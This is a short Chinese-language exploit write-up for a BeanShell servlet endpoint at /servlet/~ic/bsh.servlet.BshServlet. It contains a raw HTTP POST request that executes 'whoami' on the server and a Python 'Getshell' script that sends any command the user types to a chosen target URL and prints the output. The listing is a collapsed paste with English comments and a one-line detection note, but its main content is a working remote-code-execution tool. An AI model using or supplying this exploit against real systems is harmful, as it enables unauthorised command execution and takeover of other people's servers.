自行搭建测试环境

漏洞路径
/servlet/~ic/bsh.servlet.BshServlet

漏洞利用

数据包
| POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: 192.168.1.88:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.88:8080/servlet/~ic/bsh.servlet.BshServlet DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 42
bsh.script=exec%28%22whoami%22%29%3B%0D%0A
|
Script

# PoC client for the BeanShell servlet endpoint listed above. The listing is a
# collapsed paste (several statements per physical line) and is kept as published.
# Every request is routed through 127.0.0.1:8080 (presumably a local intercepting
# proxy — confirm) with certificate verification disabled and urllib3's
# InsecureRequestWarning silenced, so the traffic is plainly visible on the proxy.
| import requests import re requests.packages.urllib3.disable_warnings()
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
# Getshell(urllist, cmd): POSTs one BeanShell expression, prints what comes back,
# prompts for the next command and calls itself — the interactive loop is plain
# recursion, so each command deepens the call stack; the only exit is typing 'T',
# which calls exit(0).
#   urllist: base URL as "scheme://host[:port]" with no trailing slash; the path
#            '/servlet//~ic/bsh.servlet.BshServlet' is appended by string
#            concatenation (note the doubled slash, unlike the single-slash path
#            given in the writeup above).
#   cmd:     inserted verbatim into the form field bsh.script as exec("<cmd>").
# Detection notes, from the request this builds: a POST to the BshServlet path
# whose form body carries a 'bsh.script' parameter is the indicator. The reply is
# treated as vulnerable whenever the status is 200 OR the body contains
# 'BeanShell'; command output is then taken from the <pre>...</pre> content of
# the response body. If no <pre> block is found it prints a notice and recurses
# once more with 'whoami' before continuing.
def Getshell(urllist,cmd): url = urllist+'/servlet//~ic/bsh.servlet.BshServlet' burp0_data = {"bsh.script": "exec(\"%s\")" % cmd} nclist = requests.post(url,data=burp0_data,proxies=proxy,verify=False) if 'BeanShell' in nclist.text or nclist.status_code == 200: result = re.findall(r'<pre>((.|\s)*)</pre>', nclist.text) if len(result) == 0: ll = 'whoami' print('未读取到命令结果') Getshell(urllist, ll) result = result[0][0] index_start = result.index("</pre>") result = result[0: index_start] print(result) print('输入下条命令活输入T退出') print('------------------------------------------------------------------------\n') cmdlist = input("===>") if cmdlist == 'T': exit(0) else: Getshell(urllist,cmdlist)
# Only reached for a non-200 response that also lacks the string 'BeanShell':
# prints a notice to verify the servlet path by hand.
else: print('未找到漏洞页面请手动访问 /servlet//~ic/bsh.servlet.BshServlet 进行确认')
# Entry point: prompts for the base URL (the prompt shows the expected
# "https://xx.xx.xx.xx" form — no trailing slash, since Getshell concatenates
# the servlet path onto it) and for the first command, then hands control to
# Getshell, which keeps prompting until 'T' is entered.
if __name__ == '__main__': print('------------------------------------------------------------------------\n') url = input('请输入url-格式为:https://xx.xx.xx.xx: ') print('------------------------------------------------------------------------\n') cmdsr = input('输入需要执行的命令:') print('------------------------------------------------------------------------\n') Getshell(url,cmdsr)
|